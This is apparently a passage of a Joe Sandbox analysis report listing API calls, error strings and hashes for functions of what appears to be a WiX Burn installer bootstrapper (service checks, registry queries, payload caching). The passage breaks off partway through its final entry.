Instruction ID: 60ba8be1b657f79138658c553b8f7deaa9a564dbd27e0122b7b439f7045c9bdb
Opcode Fuzzy Hash: aa75fca8fd1d840cd60b84b3e8696deb3ffb332244ad7aa74a999d02948d411f
Instruction Fuzzy Hash: DB519E72D4061EFBDF119FD8DD42AEEBB78BF44300B058566FA14B2260D7359E509B90

Function 009B69D2 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 153serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,009B6F28,?), ref: 009B6A0B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,009B6F28,?,?,?), ref: 009B6A18
OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,009B6F28,?,?,?), ref: 009B6A60
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,009B6F28,?,?,?), ref: 009B6A6C
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,009B6F28,?,?,?), ref: 009B6AA6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,009B6F28,?,?,?), ref: 009B6AB0
CloseServiceHandle.ADVAPI32(00000000), ref: 009B6B67
CloseServiceHandle.ADVAPI32(?), ref: 009B6B71

Strings

wuauserv, xrefs: 009B6A5A
Failed to open WU service., xrefs: 009B6A9A
Failed to query status of WU service., xrefs: 009B6ADE
Failed to mark WU service to start on demand., xrefs: 009B6B38
msuengine.cpp, xrefs: 009B6A3C, 009B6A90, 009B6AD4
Failed to read configuration for WU service., xrefs: 009B6B17
Failed to open service control manager., xrefs: 009B6A46

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
API String ID: 971853308-301359130
Opcode ID: 420cdebaf65d4c5d1670037f9ee092da3fb51f43fe6761b5b9fe0314e4040db4
Instruction ID: f43cad5e60f8320b965ef6b73174c8a33546ec9cdfa06c609c31d9fbbc8174c6
Opcode Fuzzy Hash: 420cdebaf65d4c5d1670037f9ee092da3fb51f43fe6761b5b9fe0314e4040db4
Instruction Fuzzy Hash: A241AB72A453359BDB119FA58E45EEEB7B8AB44B30F158429FD01F7241D778EC0086A0

Function 009A3B4E Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 130COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 009A3BA2
GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 009A3BAC
GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 009A3C15
ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 009A3C1C
CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 009A3CA6

Strings

Failed to get length of temp folder., xrefs: 009A3C06
crypt32.dll, xrefs: 009A3B61
4Wu, xrefs: 009A3BA2
logging.cpp, xrefs: 009A3BD0
Failed to copy temp folder., xrefs: 009A3CCF
Failed to get temp folder., xrefs: 009A3BDA
%u\, xrefs: 009A3C36
Failed to format session id as a string., xrefs: 009A3C4A
Failed to get length of session id string., xrefs: 009A3C71

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
String ID: 4Wu$%u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
API String ID: 2407829081-99372373
Opcode ID: 178c26697980d861c0d8ede76ac8860b5731a4e0c71e99953afd8dcda2438e91
Instruction ID: 8a7a2b04345458f9ab635db4c4633b17c649a30574bc49d7450766980992ee8b
Opcode Fuzzy Hash: 178c26697980d861c0d8ede76ac8860b5731a4e0c71e99953afd8dcda2438e91
Instruction Fuzzy Hash: 7A41B072D8523DABDB219B64CC4DBEA7778AB55720F118592FD08B7240DB709F808BD0

Function 0099A28B Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0099A2B3
_MREFOpen@16.MSPDB140-MSVCRT ref: 0099A30E
RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 0099A32F
RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 0099A405

Strings

Failed to query registry key value., xrefs: 0099A36A
Failed to format key string., xrefs: 0099A2BE
Registry key not found. Key = '%ls', xrefs: 0099A396
search.cpp, xrefs: 0099A360
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0099A37A
Failed to open registry key. Key = '%ls', xrefs: 0099A3C7
Failed to format value string., xrefs: 0099A319
RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0099A3DD
Failed to set variable., xrefs: 0099A3BD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16$CloseQueryValue
String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
API String ID: 2702208347-46557908
Opcode ID: 01981fc312e34c5b0c2b34cdbf1e94f48a3a1c7c758c21b949b45630396c9724
Instruction ID: 941fd9a6e7316381cc7b6fe54d696ebf0830db0f4b14014d97e448823e312a43
Opcode Fuzzy Hash: 01981fc312e34c5b0c2b34cdbf1e94f48a3a1c7c758c21b949b45630396c9724
Instruction Fuzzy Hash: A841FA32D81128BBDF116BACCC07FAEBB68EB84710F118156FD14BA251D7319E10A7D1

Function 0099B208 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 137COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0099BAFB,00000008,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B210
GetLastError.KERNEL32(?,0099BAFB,00000008,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B21C

Strings

Failed to find valid NT image header in buffer., xrefs: 0099B2A8
Failed to get module handle to process., xrefs: 0099B24A
.wixburn, xrefs: 0099B2BE
.wix, xrefs: 0099B2E3
Failed to find Burn section., xrefs: 0099B332
Failed to read section info, data to short: %u, xrefs: 0099B314
Failed to find valid DOS image header in buffer., xrefs: 0099B27D
Failed to read section info, unsupported version: %08x, xrefs: 0099B35E
section.cpp, xrefs: 0099B240, 0099B271, 0099B29C, 0099B305, 0099B326, 0099B34F, 0099B38F
burn, xrefs: 0099B2EB
Bundle guid didn't match the guid in the PE Header in memory., xrefs: 0099B39B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
API String ID: 4242514867-926796631
Opcode ID: 7925c01a9b4cbc8a6c0dcba84afd1c9ef5f814df8da60116ee48c34906279541
Instruction ID: e96438bd33d8ac0cbbe76fa93f0c3b6640f1276ef3db90a4a9be9a99afa8a238
Opcode Fuzzy Hash: 7925c01a9b4cbc8a6c0dcba84afd1c9ef5f814df8da60116ee48c34906279541
Instruction Fuzzy Hash: 3C4129322C1310A7CF206A4AAE47F6E3354EBD5B34B65C42AF9125F2C1D7ADCC0292E5

Function 0099694B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 133libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 0099699B
GetLastError.KERNEL32 ref: 009969A5
GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 009969E8
GetLastError.KERNEL32 ref: 009969F2
FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00996B03

Strings

Failed to get OS info., xrefs: 00996A43
RtlGetVersion, xrefs: 009969DD
ntdll, xrefs: 00996995
Failed to set variant value., xrefs: 00996AE7
Failed to locate RtlGetVersion., xrefs: 00996A20
variable.cpp, xrefs: 009969C9, 00996A16
Failed to locate NTDLL., xrefs: 009969D3

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
API String ID: 3057421322-109962352
Opcode ID: a693bd0c147d00d6c9be7966b8fbf9b2dc722363db603f70f283638219044424
Instruction ID: 8bb5cfdeeb418d3ae50a6bf44e34041b86cea393ab1d3566bc1dcf468ce4eef0
Opcode Fuzzy Hash: a693bd0c147d00d6c9be7966b8fbf9b2dc722363db603f70f283638219044424
Instruction Fuzzy Hash: B041B972D462399BDF219F69CC15BEA77A8EB48710F018196E948F7250E7758E80CB90

Function 009948EF Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130memorysynchronizationCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,00995466,?,?,?,?), ref: 00994920
GetLastError.KERNEL32(?,?,?,00995466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00994931
ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00994A6E
CloseHandle.KERNEL32(?,?,?,?,00995466,?,?,?,?,?,?,?,?,?,?,?), ref: 00994A77

Strings

Failed to create the message window., xrefs: 009949CC
engine.cpp, xrefs: 00994955, 0099499E
Failed to allocate thread local storage for logging., xrefs: 0099495F
comres.dll, xrefs: 009949DD
Failed to connect to unelevated process., xrefs: 00994916
Failed to pump messages from parent process., xrefs: 00994A42
Failed to set elevated pipe into thread local storage for logging., xrefs: 009949A8

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AllocCloseErrorHandleLastMutexRelease
String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
API String ID: 687263955-1790235126
Opcode ID: 972eee353deca395311fbec35a78c8e422c1a9b1c9240fefcf50701dec86261d
Instruction ID: 1420dc8df79ccd81128fc6725fe184700e38ce85cc19ec9368605001fd91770f
Opcode Fuzzy Hash: 972eee353deca395311fbec35a78c8e422c1a9b1c9240fefcf50701dec86261d
Instruction Fuzzy Hash: 0E419573981625FBCB129BA4CC45FEFBB6CBF44B50F014227BA15A7240DB30AD5196E4

Function 00997FA5 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 216COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 00997FC2
LeaveCriticalSection.KERNEL32(?), ref: 009981EA

Strings

feclient.dll, xrefs: 0099809D, 009980F3, 00998134
Failed to get version., xrefs: 0099819B
Unsupported variable type., xrefs: 009981A7
Failed to write variable value as string., xrefs: 009981AE
Failed to write variable name., xrefs: 009981D1
Failed to write variable value as number., xrefs: 00998194
Failed to get numeric., xrefs: 009981BC
Failed to write variable value type., xrefs: 009981CA
Failed to write literal flag., xrefs: 009981C3
Failed to get string., xrefs: 009981B5
Failed to write variable count., xrefs: 00997FDD
Failed to write included flag., xrefs: 009981D8

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
API String ID: 3168844106-2118673349
Opcode ID: b4b6478c7f709995fe955927232934862fa78a5f1d0f1ab26f5a41c60d50ca83
Instruction ID: a892070a60fbb85af0195fab75147d280e5e26fa34f4e956ef53ce2615949500
Opcode Fuzzy Hash: b4b6478c7f709995fe955927232934862fa78a5f1d0f1ab26f5a41c60d50ca83
Instruction Fuzzy Hash: 9C71B272D0922AEFCF219EA8CD41FAF7BA9BF45354F10855AF90167250CB34DD129B90

Function 009A97B2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,009AA843,00000000,00000000,00000000,?,00000000), ref: 009A97CD
GetLastError.KERNEL32(?,009AA843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 009A97DD

Part of subcall function 009D4102: Sleep.KERNEL32(?,00000000,?,009A85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00994DBC), ref: 009D4119

CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 009A98E9

Strings

Failed to verify payload signature: %ls, xrefs: 009A9838
Failed to open payload in working path: %ls, xrefs: 009A980C
Failed to verify payload hash: %ls, xrefs: 009A9875
Failed to copy %ls to %ls, xrefs: 009A98D7
Copying, xrefs: 009A9888, 009A9893
%ls payload from working path '%ls' to path '%ls', xrefs: 009A9894
Failed to move %ls to %ls, xrefs: 009A98C1
Moving, xrefs: 009A987F
cache.cpp, xrefs: 009A9801

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
API String ID: 1275171361-1604654059
Opcode ID: 723af4d111a195d7c00721495068c6f973459ea48a1168eaf2bc252a503c8e80
Instruction ID: 6097eefce9da0a2896b7e5807765a8e96f8c72f09baafa69147ab2e863d48dfe
Opcode Fuzzy Hash: 723af4d111a195d7c00721495068c6f973459ea48a1168eaf2bc252a503c8e80
Instruction Fuzzy Hash: 44310872981274BBDA322A5A9C4AF6B7A5CFF83F64F014125FE147B381D364DC0096E2

Function 009965C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 009965FC

Part of subcall function 009D0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00995EB2,00000000), ref: 009D0AE0
Part of subcall function 009D0ACC: GetProcAddress.KERNEL32(00000000), ref: 009D0AE7
Part of subcall function 009D0ACC: GetLastError.KERNEL32(?,?,?,00995EB2,00000000), ref: 009D0AFE

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00996628
GetLastError.KERNEL32 ref: 00996636
GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 0099666E
GetLastError.KERNEL32 ref: 00996678
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 009966BB
GetLastError.KERNEL32 ref: 009966C5

Strings

Failed to get 32-bit system folder., xrefs: 009966A6
Failed to set system folder variant value., xrefs: 00996724
Failed to get 64-bit system folder., xrefs: 00996664
variable.cpp, xrefs: 0099665A, 0099669C
Failed to backslash terminate system folder., xrefs: 00996708

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
API String ID: 325818893-1590374846
Opcode ID: 9c39d811c81cc4bab2e3d374d7d6c3f87232c9d2abda98f994598b5c3894a43a
Instruction ID: bce906bdaaa738b2b7c775e4feb6387db41bb2c13cd6bc834621f68168434b62
Opcode Fuzzy Hash: 9c39d811c81cc4bab2e3d374d7d6c3f87232c9d2abda98f994598b5c3894a43a
Instruction Fuzzy Hash: 24314972D86339A7DF219BA98C4DB9A376CAF40750F024556BD04B7280DB74DD80DAE0

Function 009A3F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 009A3AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,009A3FB5,feclient.dll,?,00000000,?,?,?,00994B12), ref: 009A3B42

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00994B12,?,?,009DB488,?,00000001,00000000,00000000), ref: 009A404C

Strings

msasn1.dll, xrefs: 009A4162, 009A41A3
feclient.dll, xrefs: 009A3FAF, 009A405C
crypt32.dll, xrefs: 009A3FF2, 009A4057, 009A405F, 009A40C6, 009A4100, 009A4141, 009A4160, 009A419E, 009A41C8
Failed to copy log path to prefix., xrefs: 009A416E
Setup, xrefs: 009A3FF9
Failed to copy full log path to prefix., xrefs: 009A41AF
log, xrefs: 009A3FF3
clbcatq.dll, xrefs: 009A4185
Failed to copy log extension to extension., xrefs: 009A4191
Failed to get non-session specific TEMP folder., xrefs: 009A40F6
Failed to open log: %ls, xrefs: 009A40C8
Failed to get current directory., xrefs: 009A402E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: 5e69406c456ad1f6984422407adeed3c636f56f59cbd0894f7299265cd072e47
Instruction ID: 5a39c0847f3533c207737a68565e7c1c23026d48ac4a77ee44a0ca7a966b8887
Opcode Fuzzy Hash: 5e69406c456ad1f6984422407adeed3c636f56f59cbd0894f7299265cd072e47
Instruction Fuzzy Hash: 0661B171A04225BEDF229F64CC46B7A77ACEFA2340F158565F901DB240E7B0ED909BE1

Function 00996DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,00995445,00000006,?,009982B9,?,?,?,00000000,00000000,00000001), ref: 00996DC8

Part of subcall function 009956A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00996595,00996595,?,0099563D,?,?,00000000), ref: 009956E5
Part of subcall function 009956A9: GetLastError.KERNEL32(?,0099563D,?,?,00000000,?,?,00996595,?,00997F02,?,?,?,?,?), ref: 00995714

LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,009982B9), ref: 00996F59

Strings

Unsetting variable '%ls', xrefs: 00996F15
Setting string variable '%ls' to value '%ls', xrefs: 00996EED
Failed to set value of variable: %ls, xrefs: 00996F41
Setting hidden variable '%ls', xrefs: 00996E86
Failed to insert variable '%ls'., xrefs: 00996E0D
variable.cpp, xrefs: 00996E4B
Attempt to set built-in variable value: %ls, xrefs: 00996E56
Setting numeric variable '%ls' to value %lld, xrefs: 00996EFA
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00996F6B
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00996ED0
Failed to find variable value '%ls'., xrefs: 00996DE3

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: 53fb8513fe430ded6e7afaf389973216530e97756b8b73d96f8676a0275e6433
Instruction ID: 4653845e720cc72c564b81b47253c1ecd86faf06579472bce159fc0fe5bfd579
Opcode Fuzzy Hash: 53fb8513fe430ded6e7afaf389973216530e97756b8b73d96f8676a0275e6433
Instruction Fuzzy Hash: FD510271A80225ABCF309F6DDC4AF6B3BACEBD5714F11441AF8486A382C275DD50CAE1

Function 009A2C1C Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 299COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 009A2C8A

Strings

Failed to add registration action for dependent related bundle., xrefs: 009A2F8E
Failed to allocate registration action., xrefs: 009A2CF3
Failed to check for remaining dependents during planning., xrefs: 009A2E30
Failed to add registration action for self dependent., xrefs: 009A2F57
crypt32.dll, xrefs: 009A2CD5, 009A2DCF, 009A2EC4, 009A2F39
Failed to create the string dictionary., xrefs: 009A2CC3
Failed to add dependent bundle provider key to ignore dependents., xrefs: 009A2DF4
wininet.dll, xrefs: 009A2ED7
Failed to add self-dependent to ignore dependents., xrefs: 009A2D0E
Failed to add dependents ignored from command-line., xrefs: 009A2D3F

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
API String ID: 1825529933-1705955799
Opcode ID: e96299d038c6fc5a88e14c915f556edf818ae6f53718d5cee559af3d73212f78
Instruction ID: 1cde07f5a56faaaa88188732477c3f58d3f7a8a7dd813532939430d0bee3a30d
Opcode Fuzzy Hash: e96299d038c6fc5a88e14c915f556edf818ae6f53718d5cee559af3d73212f78
Instruction Fuzzy Hash: 3BB17C70A04216EFDF299F68C841BAEBBB9FF46710F10816AF815AB251D734D990CBD1

Function 009AF90B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 187COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 009AF947
UuidCreate.RPCRT4(?), ref: 009AFA2A
